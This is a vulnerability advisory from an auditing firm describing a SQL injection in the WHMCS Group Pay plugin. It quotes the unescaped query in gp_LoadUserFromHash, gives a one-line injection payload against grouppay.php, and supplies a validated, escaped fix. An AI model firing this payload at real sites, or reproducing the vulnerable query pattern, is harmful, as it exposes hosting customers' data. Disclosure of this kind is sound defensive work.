#######################################################################
Title: WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web: http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################
============
Introduction
============
We have found a SQL injection in the Group Pay plugin for WHMCS.
A lot of game hosting companies are using this plugin.
The SQL injection is in the function gp_LoadUserFromHash, which places the hash request parameter into a query string without escaping it.
============
Exploits
============
- SQL Injection
grouppay.php?hash=%hash%' and '1'='1
============
Vulnerable Code (SQL Injection)
============
/modules/addons/group_pay/functions_hash.php
/**
 * Vulnerable version quoted by the advisory: looks up a client id by the
 * group-pay hash (per the advisory, the `hash` parameter of grouppay.php).
 *
 * $hash is placed into the SQL text without escaping or validation, so a
 * single quote in it closes the string literal and the rest of the value is
 * parsed as SQL.
 *
 * @param string $hash value compared with md5(CONCAT(id,email))
 * @return mixed first column of the first row, or false when mysql_query() fails
 */
function gp_LoadUserFromHash($hash) {
    //Kill the Dashes
    // Only "-" is stripped; quotes and every other character pass through unchanged.
    $hash = str_replace ( "-", "", $hash );
    // Injection point: $hash is interpolated directly inside the quoted literal.
    $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
    if($result){
        // mysql_fetch_row() returns false when no row matched, so $row[0] is
        // then null rather than a client id.
        $row = mysql_fetch_row ( $result );
        return $row [0];
    }else{
        return false;
    }
}
============
Fix
============
/modules/addons/group_pay/functions_hash.php
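/**
 * Look up a client id by its group-pay hash.
 *
 * The hash is compared with md5(CONCAT(id,email)) in tblclients. The value
 * comes from the request, so it is validated as a 32-digit hex string before
 * any SQL is built and is still escaped afterwards as defence in depth.
 *
 * NOTE(review): ext/mysql was deprecated in PHP 5.5 and removed in PHP 7.0.
 * When the plugin moves to mysqli or PDO, use a prepared statement with a
 * bound parameter instead of string interpolation.
 *
 * NOTE(review): the token is md5 of the client id and e-mail address, neither
 * of which is secret; a random per-client token stored server-side would be
 * harder to guess. Changing that is outside this function.
 *
 * @param string $hash hash from the request, with or without dashes
 * @return mixed client id on a match, null when no client matches, false on
 *               invalid input or query failure
 */
function gp_LoadUserFromHash($hash) {
    // Reject arrays and other non-strings (e.g. hash[]=x) before touching them.
    if (!is_string($hash)) {
        return false;
    }

    //Kill the Dashes
    $hash = str_replace("-", "", $hash);

    // md5() output is exactly 32 hex digits; anything else cannot match a
    // client and never needs to reach the database.
    if (strlen($hash) !== 32 || !ctype_xdigit($hash)) {
        return false;
    }

    // A validated hex string contains nothing to escape; the call is kept so
    // the query stays safe if the validation above is ever relaxed.
    $hash = mysql_real_escape_string($hash);
    $result = mysql_query("SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'");
    if (!$result) {
        return false;
    }

    // mysql_fetch_row() returns false when no row matched; return null in that
    // case (the value callers received before) without indexing into false.
    $row = mysql_fetch_row($result);
    return $row ? $row[0] : null;
}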
#######################################################################